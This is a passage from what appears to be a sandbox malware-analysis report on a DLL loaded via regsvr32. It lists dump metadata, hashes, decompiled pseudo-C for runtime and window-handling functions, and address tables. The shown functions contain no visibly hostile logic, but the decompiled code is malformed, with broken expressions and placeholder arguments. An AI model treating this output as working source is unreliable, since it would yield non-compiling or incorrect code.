                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$AllocLocalValue$Enter
                                                                              • String ID:
                                                                              • API String ID: 2344649020-0
                                                                              • Opcode ID: 293e593b04e6a0167beaef0b98cac86171f6d29ec497e76bdf71bb7c6749bfed
                                                                              • Instruction ID: 9bc057ccd80c383aff3f2ab6be3b27ea76c04d1e90488ec609d90641c07e8989
                                                                              • Opcode Fuzzy Hash: 293e593b04e6a0167beaef0b98cac86171f6d29ec497e76bdf71bb7c6749bfed
                                                                              • Instruction Fuzzy Hash: D041F33A302B4087DB1ACF25E8543997360F748BA8F518229EF6A07794DF78D9A4CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002FB98 Relevance: 12.1, APIs: 8, Instructions: 69stringthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: StringType$lstrlen$LocaleMetricsSystemThreadlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 1373347803-0
                                                                              • Opcode ID: e90305da24a2d2b6c31d0f10b6b009a5a69110484cdf9526c04d3effeb027025
                                                                              • Instruction ID: 1b94401cfb8aab746027d32b377c57685f4b8471804d82473931f80bc4952ce8
                                                                              • Opcode Fuzzy Hash: e90305da24a2d2b6c31d0f10b6b009a5a69110484cdf9526c04d3effeb027025
                                                                              • Instruction Fuzzy Hash: 9F21B272704A8186D7218F21F8547BA73A1F789BD9F814639CE9A477D4EFB8C985CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003D6A0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 203COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E1003D6A0(signed int __edi, signed long long __rbx, void* __rdx, signed long long __rdi, long long __rsi, void* __r8, signed long long __r12, long long __r13, long long __r14, long long __r15, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _v8;
				void* _v16;
				void* _v24;
				intOrPtr* _v64;
				short _v70;
				char _v136;
				void* _t64;
				void* _t67;
				signed char _t68;
				signed int _t69;
				long _t71;
				intOrPtr _t76;
				signed int _t78;
				intOrPtr _t80;
				signed int _t91;
				long long* _t93;
				long long _t95;
				long long _t96;
				signed long long _t102;
				long long* _t105;
				signed char _t110;
				void* _t114;
				signed long long _t115;
				signed long long _t116;
				long long _t120;
				intOrPtr* _t122;
				void* _t123;
				long long* _t124;
				void* _t125;
				long long* _t126;
				long long* _t127;
				signed long long _t128;
				signed char* _t132;
				intOrPtr* _t135;
				signed char* _t136;

				_t128 = __r12;
				_t125 = __r8;
				_t115 = __rdi;
				_t114 = __rdx;
				_t102 = __rbx;
				_t91 = __edi;
				_t93 = _t124;
				 *((long long*)(_t93 + 8)) = __rbx;
				 *((long long*)(_t93 + 0x10)) = __rsi;
				 *((long long*)(_t93 + 0x18)) = __rdi;
				 *((long long*)(_t93 + 0x20)) = __r12;
				 *((long long*)(_t93 - 8)) = __r13;
				 *((long long*)(_t93 - 0x10)) = __r14;
				 *((long long*)(_t93 - 0x18)) = __r15;
				_t107 =  &_v136;
				GetStartupInfoA(??);
				_t64 = E1003D420(_t93, __rbx,  &_v136, __rdx, __rdi, __rsi, _t123, __r12);
				_t126 = _t93;
				if(_t93 != 0) {
					 *0x100772a0 = _t93;
					_t80 = 0x20;
					 *0x10077288 = 0x20;
					if(_t126 >= _t93 + 0x800) {
						r12d = 0;
						L7:
						if(_v70 == 0) {
							L29:
							r13d = r12d;
							_t116 = _t128;
							do {
								_t105 = (_t116 << 6) +  *0x100772a0;
								_t95 =  *_t105;
								if(_t95 == 0xffffffff || _t95 == 0xfffffffe) {
									 *(_t105 + 8) = 0x81;
									if(_t116 != 0) {
									}
									GetStdHandle();
									_t120 = _t95;
									if(_t95 == 0xffffffff || _t95 == 0) {
										L46:
										 *(_t105 + 8) =  *(_t105 + 8) | 0x00000040;
										 *_t105 = 0xfffffffe;
										goto L47;
									} else {
										_t68 = GetFileType();
										if(_t68 == 0) {
											goto L46;
										}
										 *_t105 = _t120;
										_t69 = _t68 & 0x000000ff;
										if(_t69 != 2) {
											if(_t69 == 3) {
												 *(_t105 + 8) =  *(_t105 + 8) | 0x00000008;
											}
										} else {
											 *(_t105 + 8) =  *(_t105 + 8) | 0x00000040;
										}
										_t52 = _t105 + 0x10; // 0x10
										if(E10042EB0(0xfa0, _t95, _t105, _t52, _t114, _t116, _t120, _t123, _t125, _t128) == 0) {
											_t67 = 0xffffffff;
											L49:
											return _t67;
										} else {
											 *((intOrPtr*)(_t105 + 0xc)) =  *((intOrPtr*)(_t105 + 0xc)) + 1;
											goto L47;
										}
									}
								} else {
									 *(_t105 + 8) =  *(_t105 + 8) | 0x00000080;
								}
								L47:
								r13d = r13d + 1;
								_t116 = _t116 + 1;
							} while (_t116 < 3);
							SetHandleCount();
							_t67 = 0;
							goto L49;
						}
						_t135 = _v64;
						if(_t135 == 0) {
							goto L29;
						}
						_t96 =  *_t135;
						_t136 = _t135 + 4;
						_t132 =  &(_t136[_t96]);
						r15d = 0x800;
						r15d =  <  ? _t64 : r15d;
						if(_t80 >= r15d) {
							_t122 = 0x100772a0;
							L19:
							_t78 = r12d;
							if(r15d <= 0) {
								goto L29;
							} else {
								goto L20;
							}
							do {
								L20:
								_t110 =  *_t132;
								if(_t110 != 0xffffffff && _t110 != 0xfffffffe) {
									_t71 =  *_t136 & 0x000000ff;
									if((_t71 & 0x00000001) == 0) {
										goto L28;
									}
									if((_t71 & 0x00000008) != 0) {
										L25:
										dil = _t71;
										_t91 = _t91 & 0x0000001f;
										_t115 = (_t115 << 6) +  *((intOrPtr*)(_t122 + (_t78 >> 5) * 8));
										 *_t115 =  *_t132;
										 *((char*)(_t115 + 8)) =  *_t136 & 0x000000ff;
										_t40 = _t115 + 0x10; // 0x10
										if(E10042EB0(0xfa0,  *_t132, _t102, _t40, _t114, _t115, _t122, _t123, _t125, _t128) == 0) {
											_t67 = 0xffffffff;
											goto L49;
										}
										 *((intOrPtr*)(_t115 + 0xc)) =  *((intOrPtr*)(_t115 + 0xc)) + 1;
										goto L28;
									}
									_t71 = GetFileType();
									if(_t71 == 0) {
										goto L28;
									}
									goto L25;
								}
								L28:
								_t78 = _t78 + 1;
								_t136 =  &(_t136[1]);
								_t132 =  &(_t132[8]);
							} while (_t78 < r15d);
							goto L29;
						}
						_t122 = 0x100772a0;
						while(1) {
							E1003D420(_t96, _t102, _t107, _t114, _t115, _t122, _t123, _t128);
							_t127 = _t96;
							if(_t96 == 0) {
								break;
							}
							 *((long long*)(_t122 + _t102 * 8)) = _t96;
							_t76 =  *0x10077288 + 0x20;
							 *0x10077288 = _t76;
							_t23 = _t127 + 0x800; // 0x800
							_t107 = _t23;
							if(_t127 >= _t23) {
								L15:
								_t102 = _t102 + 1;
								if(_t76 < r15d) {
									continue;
								}
								goto L19;
							} else {
								goto L13;
							}
							do {
								L13:
								 *((char*)(_t127 + 8)) = 0;
								 *_t127 = 0xffffffff;
								 *((char*)(_t127 + 9)) = 0xa;
								 *(_t127 + 0xc) = r12d;
								 *(_t127 + 0x38) =  *(_t127 + 0x38) & 0x00000080;
								 *((char*)(_t127 + 0x39)) = 0xa;
								 *((char*)(_t127 + 0x3a)) = 0xa;
								_t127 = _t127 + 0x40;
								_t96 =  *((intOrPtr*)(_t122 + _t102 * 8)) + 0x800;
							} while (_t127 < _t96);
							_t76 =  *0x10077288;
							goto L15;
						}
						r15d =  *0x10077288;
						goto L19;
					}
					r12d = 0;
					do {
						 *((intOrPtr*)(_t126 + 8)) = r12b;
						 *_t126 = 0xffffffff;
						 *((char*)(_t126 + 9)) = 0xa;
						 *(_t126 + 0xc) = r12d;
						 *((intOrPtr*)(_t126 + 0x38)) = r12b;
						 *((char*)(_t126 + 0x39)) = 0xa;
						 *((char*)(_t126 + 0x3a)) = 0xa;
						_t126 = _t126 + 0x40;
					} while (_t126 <  *0x100772a0 + 0x800);
					_t80 =  *0x10077288;
					goto L7;
				}
				_t10 = _t126 - 1; // -1
				_t67 = _t10;
				goto L49;
			}






































                                                                              0x1003d6a0
                                                                              0x1003d6a0
                                                                              0x1003d6a0
                                                                              0x1003d6a0
                                                                              0x1003d6a0
                                                                              0x1003d6a0
                                                                              0x1003d6a0
                                                                              0x1003d6aa
                                                                              0x1003d6ae
                                                                              0x1003d6b2
                                                                              0x1003d6b6
                                                                              0x1003d6ba
                                                                              0x1003d6be
                                                                              0x1003d6c2
                                                                              0x1003d6c6
                                                                              0x1003d6cb
                                                                              0x1003d6da
                                                                              0x1003d6df
                                                                              0x1003d6e5
                                                                              0x1003d6f0
                                                                              0x1003d6f7
                                                                              0x1003d6fc
                                                                              0x1003d70b
                                                                              0x1003d750
                                                                              0x1003d753
                                                                              0x1003d759
                                                                              0x1003d8b2
                                                                              0x1003d8b2
                                                                              0x1003d8b5
                                                                              0x1003d8c0
                                                                              0x1003d8c7
                                                                              0x1003d8ce
                                                                              0x1003d8d5
                                                                              0x1003d8e6
                                                                              0x1003d8ed
                                                                              0x1003d8ed
                                                                              0x1003d903
                                                                              0x1003d909
                                                                              0x1003d910
                                                                              0x1003d95d
                                                                              0x1003d95d
                                                                              0x1003d961
                                                                              0x00000000
                                                                              0x1003d917
                                                                              0x1003d91a
                                                                              0x1003d922
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003d924
                                                                              0x1003d927
                                                                              0x1003d92d
                                                                              0x1003d938
                                                                              0x1003d93a
                                                                              0x1003d93a
                                                                              0x1003d92f
                                                                              0x1003d92f
                                                                              0x1003d92f
                                                                              0x1003d93e
                                                                              0x1003d94e
                                                                              0x1003d956
                                                                              0x1003d98f
                                                                              0x1003d9ce
                                                                              0x1003d950
                                                                              0x1003d950
                                                                              0x00000000
                                                                              0x1003d950
                                                                              0x1003d94e
                                                                              0x1003d8dd
                                                                              0x1003d8dd
                                                                              0x1003d8dd
                                                                              0x1003d968
                                                                              0x1003d968
                                                                              0x1003d96c
                                                                              0x1003d970
                                                                              0x1003d980
                                                                              0x1003d986
                                                                              0x00000000
                                                                              0x1003d986
                                                                              0x1003d75f
                                                                              0x1003d767
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003d76d
                                                                              0x1003d770
                                                                              0x1003d774
                                                                              0x1003d778
                                                                              0x1003d781
                                                                              0x1003d78d
                                                                              0x1003d825
                                                                              0x1003d82c
                                                                              0x1003d82c
                                                                              0x1003d832
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003d834
                                                                              0x1003d834
                                                                              0x1003d834
                                                                              0x1003d83c
                                                                              0x1003d844
                                                                              0x1003d84a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003d84e
                                                                              0x1003d85a
                                                                              0x1003d864
                                                                              0x1003d867
                                                                              0x1003d86e
                                                                              0x1003d876
                                                                              0x1003d87d
                                                                              0x1003d880
                                                                              0x1003d890
                                                                              0x1003d898
                                                                              0x00000000
                                                                              0x1003d898
                                                                              0x1003d892
                                                                              0x00000000
                                                                              0x1003d892
                                                                              0x1003d850
                                                                              0x1003d858
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003d858
                                                                              0x1003d8a2
                                                                              0x1003d8a2
                                                                              0x1003d8a5
                                                                              0x1003d8a9
                                                                              0x1003d8ad
                                                                              0x00000000
                                                                              0x1003d834
                                                                              0x1003d793
                                                                              0x1003d7a0
                                                                              0x1003d7a8
                                                                              0x1003d7ad
                                                                              0x1003d7b3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003d7b5
                                                                              0x1003d7bf
                                                                              0x1003d7c2
                                                                              0x1003d7c8
                                                                              0x1003d7c8
                                                                              0x1003d7d2
                                                                              0x1003d811
                                                                              0x1003d811
                                                                              0x1003d818
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003d7d4
                                                                              0x1003d7d4
                                                                              0x1003d7d4
                                                                              0x1003d7d9
                                                                              0x1003d7e0
                                                                              0x1003d7e5
                                                                              0x1003d7e9
                                                                              0x1003d7ee
                                                                              0x1003d7f3
                                                                              0x1003d7f8
                                                                              0x1003d800
                                                                              0x1003d806
                                                                              0x1003d80b
                                                                              0x00000000
                                                                              0x1003d80b
                                                                              0x1003d81c
                                                                              0x00000000
                                                                              0x1003d81c
                                                                              0x1003d70d
                                                                              0x1003d710
                                                                              0x1003d710
                                                                              0x1003d714
                                                                              0x1003d71b
                                                                              0x1003d720
                                                                              0x1003d724
                                                                              0x1003d728
                                                                              0x1003d72d
                                                                              0x1003d732
                                                                              0x1003d743
                                                                              0x1003d748
                                                                              0x00000000
                                                                              0x1003d748
                                                                              0x1003d6e7
                                                                              0x1003d6e7
                                                                              0x00000000

                                                                              APIs
                                                                              • GetStartupInfoA.KERNEL32 ref: 1003D6CB
                                                                                • Part of subcall function 1003D420: Sleep.KERNEL32(?,?,?,?,1003CFF7,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003D470
                                                                              • GetFileType.KERNEL32 ref: 1003D850
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: FileInfoSleepStartupType
                                                                              • String ID: @
                                                                              • API String ID: 1527402494-2766056989
                                                                              • Opcode ID: 09dea14761957038d7e38656ef98bcd760ee65faeb54956a561ffd46d14a3bea
                                                                              • Instruction ID: 3fbd1b13af52a4dc34c646c4edf691f44870873de70bd389dae3cc9b0150beef
                                                                              • Opcode Fuzzy Hash: 09dea14761957038d7e38656ef98bcd760ee65faeb54956a561ffd46d14a3bea
                                                                              • Instruction Fuzzy Hash: DB81ED327047808AD752DB24E84435837A5F70A7B5F658326DAB94B3E1EF79E895C302
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10050730 Relevance: 10.7, APIs: 7, Instructions: 179COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$Info
                                                                              • String ID:
                                                                              • API String ID: 1775632426-0
                                                                              • Opcode ID: e8271c7f7320b5cfc4e8a329dbd315cb492083c89879db9e92678c8e4c68d33e
                                                                              • Instruction ID: c01cce1c348a29eceefbf57b93821ce112ab8e5dcc0431ae157b85d817ba7440
                                                                              • Opcode Fuzzy Hash: e8271c7f7320b5cfc4e8a329dbd315cb492083c89879db9e92678c8e4c68d33e
                                                                              • Instruction Fuzzy Hash: 5C619A32700B808AE750CF22A84079E77E5F748BE8F514629BEAD87B99DF74C558C740
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10008A90 Relevance: 10.6, APIs: 7, Instructions: 110windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 62%
                                                                              			E10008A90(void* __ebx, void* __ecx, intOrPtr __edx, long long __rax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r11, void* __r12, void* __r13) {
				long _t36;
				void* _t53;
				void* _t54;
				intOrPtr _t64;
				long long _t70;
				long long _t71;
				intOrPtr _t94;
				void* _t96;
				long long _t102;
				void* _t105;
				void* _t106;
				void* _t109;
				void* _t110;
				void* _t113;
				void* _t114;
				void* _t115;

				_t115 = __r13;
				_t114 = __r12;
				_t113 = __r11;
				_t110 = __r9;
				_t109 = __r8;
				_t99 = __rsi;
				_t71 = __rbx;
				_t70 = __rax;
				_t54 = __ecx;
				_t53 = __ebx;
				_t106 = _t105 - 0x28;
				 *((long long*)(_t106 + 0x40)) = __rsi;
				_t64 = __edx;
				_t56 =  *((intOrPtr*)(__rcx + 0x114));
				 *((long long*)(_t106 + 0x48)) = __rdi;
				_t96 = __rcx;
				if( *((intOrPtr*)(__rcx + 0x114)) != 0xffffffff) {
					if( *((intOrPtr*)(__rcx + 0x110)) == 0) {
						r9d = 0xff00;
						r8d = 0x1000;
						E1000AEF4(_t56, __rcx);
					} else {
						r9d = 0xf000;
						r8d = 0x1000;
						E1000AEF4(_t56, __rcx);
					}
					DestroyIcon();
					DestroyIcon(??);
				}
				 *((long long*)(_t106 + 0x38)) = _t102;
				_t36 = E10023E40(_t70);
				if(_t70 != 0) {
					_t92 =  *_t70;
					_t36 =  *((intOrPtr*)( *_t70 + 0xe8))();
					_t102 = _t70;
				}
				if( *((intOrPtr*)(_t96 + 0x114)) == _t64) {
					 *((intOrPtr*)(_t96 + 0x114)) = 0xffffffff;
					r9d = 0;
					r8d = 0;
					SendMessageW(??, ??, ??, ??);
					r9d = 0;
					_t13 = _t110 + 1; // 0x1
					r8d = _t13;
					return SendMessageW(??, ??, ??, ??);
				}
				 *((intOrPtr*)(_t96 + 0x114)) = _t64;
				if(_t64 != 0xffffffff) {
					if( *((intOrPtr*)(_t96 + 0x110)) == 0) {
						r9d = 0xff00;
						r8d = 0x2100;
					} else {
						r9d = 0xf000;
						r8d = 0x2000;
					}
					E1000AEF4(_t64, _t96);
					r9d = 0;
					_t20 = _t110 + 1; // 0x1
					r8d = _t20;
					 *((long long*)(_t106 + 0x30)) = _t71;
					SendMessageW(??, ??, ??, ??);
					E1000B47C(_t53, 0x1002, _t70, _t70, _t92, _t109, _t110, _t113);
					E1000A57C(_t53, _t54, 0x1002, _t64, _t70, _t109, _t110, _t113);
					r9d = 0;
					r8d = _t64;
					E10008350(_t54, 0x1002, _t70,  *((intOrPtr*)(_t70 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t70 + 0xc8)))),  *((intOrPtr*)(_t70 + 8)), _t96, _t99, _t109, _t110, _t113, _t114, _t115);
					r8d = 0;
					 *((long long*)(_t96 + 0x118)) = _t70;
					SendMessageW(??, ??, ??, ??);
					r9d = 0;
					r8d = 0;
					SendMessageW(??, ??, ??, ??);
					E1000B47C(_t53, 0x1002, _t70, _t70,  *((intOrPtr*)(_t70 + 8)), _t109, _t70, _t113);
					E1000A57C(_t53, _t54, 0x1002, _t64, _t70, _t109, _t70, _t113);
					r9d = 0;
					r8d = _t64;
					_t94 =  *((intOrPtr*)(_t70 + 8));
					E10008350(_t54, 0x1002, _t70,  *((intOrPtr*)(_t70 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t70 + 0xc8)))), _t94, _t96, _t99, _t109, _t70, _t113, _t114, _t115);
					 *((long long*)(_t96 + 0x120)) = _t70;
					_t31 = _t94 - 0x7f; // 0x1
					r8d = _t31;
					_t36 = SendMessageW(??, ??, ??, ??);
				}
				return _t36;
			}



















                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a90
                                                                              0x10008a94
                                                                              0x10008a99
                                                                              0x10008a9b
                                                                              0x10008aa4
                                                                              0x10008aa9
                                                                              0x10008aac
                                                                              0x10008ab5
                                                                              0x10008aca
                                                                              0x10008ad0
                                                                              0x10008ad6
                                                                              0x10008ab7
                                                                              0x10008ab7
                                                                              0x10008abd
                                                                              0x10008ac3
                                                                              0x10008ac3
                                                                              0x10008ae2
                                                                              0x10008aef
                                                                              0x10008aef
                                                                              0x10008af5
                                                                              0x10008afa
                                                                              0x10008b02
                                                                              0x10008b04
                                                                              0x10008b0a
                                                                              0x10008b10
                                                                              0x10008b10
                                                                              0x10008b1d
                                                                              0x10008b1f
                                                                              0x10008b2d
                                                                              0x10008b30
                                                                              0x10008b38
                                                                              0x10008b42
                                                                              0x10008b45
                                                                              0x10008b45
                                                                              0x10008b61
                                                                              0x10008b61
                                                                              0x10008b6b
                                                                              0x10008b71
                                                                              0x10008b7e
                                                                              0x10008b8e
                                                                              0x10008b94
                                                                              0x10008b80
                                                                              0x10008b80
                                                                              0x10008b86
                                                                              0x10008b86
                                                                              0x10008b9f
                                                                              0x10008ba8
                                                                              0x10008bab
                                                                              0x10008bab
                                                                              0x10008bb4
                                                                              0x10008bb9
                                                                              0x10008bc2
                                                                              0x10008bcb
                                                                              0x10008bd0
                                                                              0x10008bda
                                                                              0x10008be3
                                                                              0x10008be8
                                                                              0x10008bf0
                                                                              0x10008bfe
                                                                              0x10008c08
                                                                              0x10008c0b
                                                                              0x10008c13
                                                                              0x10008c1c
                                                                              0x10008c25
                                                                              0x10008c2a
                                                                              0x10008c34
                                                                              0x10008c37
                                                                              0x10008c3d
                                                                              0x10008c47
                                                                              0x10008c52
                                                                              0x10008c52
                                                                              0x10008c59
                                                                              0x10008c5f
                                                                              0x10008c77

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyIcon
                                                                              • String ID:
                                                                              • API String ID: 3419509030-0
                                                                              • Opcode ID: 1bba7af260bcc4efb1caeed1ebd22f1ed0f072de9911de1b5da4b9d76203067f
                                                                              • Instruction ID: f3fa2e05aefed23a1886134cdb8ba3e92a6bb41cb333759efb65348a5111de51
                                                                              • Opcode Fuzzy Hash: 1bba7af260bcc4efb1caeed1ebd22f1ed0f072de9911de1b5da4b9d76203067f
                                                                              • Instruction Fuzzy Hash: B3418A36701A8082E764DB26E955B9E7360F789FC4F154221EF8907F99CF39D9918B40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10038308 Relevance: 10.6, APIs: 7, Instructions: 88windowstringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 56%
                                                                              			E10038308(void* __ebx, void* __ecx, void* __esi, void* __rax, long long __rcx, void* __rdx, void* __r8, signed int __r11) {
				int _t27;
				void* _t35;
				int _t36;
				void* _t55;
				void* _t56;
				intOrPtr _t57;
				long long _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				void* _t62;
				long long _t86;
				long long _t87;
				void* _t91;
				void* _t93;

				_t92 = __r11;
				_t56 = __rax;
				_t47 = __esi;
				_t45 = __ecx;
				_t44 = __ebx;
				_t86 = __rcx;
				_t27 = lstrlenW(??);
				_t46 = 0;
				_t3 = _t56 + 1; // 0x1
				r11d = _t3;
				_t57 =  *((intOrPtr*)(__rcx + 0xe8));
				r8d =  *((intOrPtr*)(_t57 + 0x38));
				_t58 =  *((intOrPtr*)(_t57 + 0x30));
				r8d = r8d - r11d;
				_t90 = __r8 + __r8;
				E1003A240(_t27, __ecx, 0, _t58 + __r11 * 2, __rdx, __r8 + __r8);
				GetFocus();
				_t60 =  *((intOrPtr*)(__rcx + 0xe8));
				r12d = 0;
				E10027B54(__ebx, 0, __esi, _t58, __rcx, __rdx, __r8 + __r8, _t91, __r11);
				 *((long long*)(_t60 + 8)) = _t58;
				E1001190C(_t44, __ecx, 0, __esi, _t58, __r8 + __r8, _t91, __r11);
				if( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0xe8)) + 8)) != _t93 && IsWindowEnabled() != 0) {
					_t46 = 0;
					r12d = 1;
					EnableWindow(??, ??);
				}
				E10009A4C(_t44, _t45, _t46, _t47, _t58, _t90, _t91, _t92);
				asm("bt dword [ecx+0x60], 0x13");
				_t87 = _t58;
				if(0 >= 0) {
					E100140D0(_t44, _t45, _t46, _t47, _t58, _t86, _t90, _t91, _t92);
				} else {
					 *((long long*)(_t58 + 0x30)) = _t86;
				}
				_t61 =  *((intOrPtr*)(_t86 + 0xe8));
				if( *((intOrPtr*)(_t86 + 0xf0)) == 0) {
					E1000A57C(_t44, _t45, _t46, _t47, _t58, _t90, _t91, _t92);
					_t35 = E10038210(_t44, _t45, _t46, _t47, _t58,  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc8)) + 8)), _t61, _t90, _t91, _t92);
				} else {
					E1000A57C(_t44, _t45, _t46, _t47, _t58, _t90, _t91, _t92);
					_t35 = E100380AC(_t44, _t45, _t46, _t47, _t58,  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc8)) + 8)), _t61, _t90, _t91, _t92);
				}
				_t62 = _t35;
				 *((long long*)(_t87 + 0x30)) = 0;
				if(r12d != 0) {
					_t46 = 1;
					EnableWindow(??, ??);
				}
				_t36 = IsWindow();
				_t53 = _t36;
				if(_t36 != 0) {
					SetFocus();
				}
				E10027BAC(_t46, _t47, _t53, _t58, _t86, _t90, _t91, _t92);
				_t59 =  !=  ? _t62 : _t58;
				_t55 =  !=  ? _t62 : _t58;
				return 2;
			}

















                                                                              0x10038308
                                                                              0x10038308
                                                                              0x10038308
                                                                              0x10038308
                                                                              0x10038308
                                                                              0x10038313
                                                                              0x10038321
                                                                              0x10038327
                                                                              0x10038329
                                                                              0x10038329
                                                                              0x1003832d
                                                                              0x10038334
                                                                              0x10038338
                                                                              0x1003833c
                                                                              0x10038343
                                                                              0x10038346
                                                                              0x1003834b
                                                                              0x10038351
                                                                              0x1003835e
                                                                              0x10038361
                                                                              0x10038366
                                                                              0x1003836a
                                                                              0x1003837a
                                                                              0x10038391
                                                                              0x10038393
                                                                              0x1003839d
                                                                              0x1003839d
                                                                              0x100383a3
                                                                              0x100383af
                                                                              0x100383b4
                                                                              0x100383b7
                                                                              0x100383c2
                                                                              0x100383b9
                                                                              0x100383b9
                                                                              0x100383b9
                                                                              0x100383ce
                                                                              0x100383d5
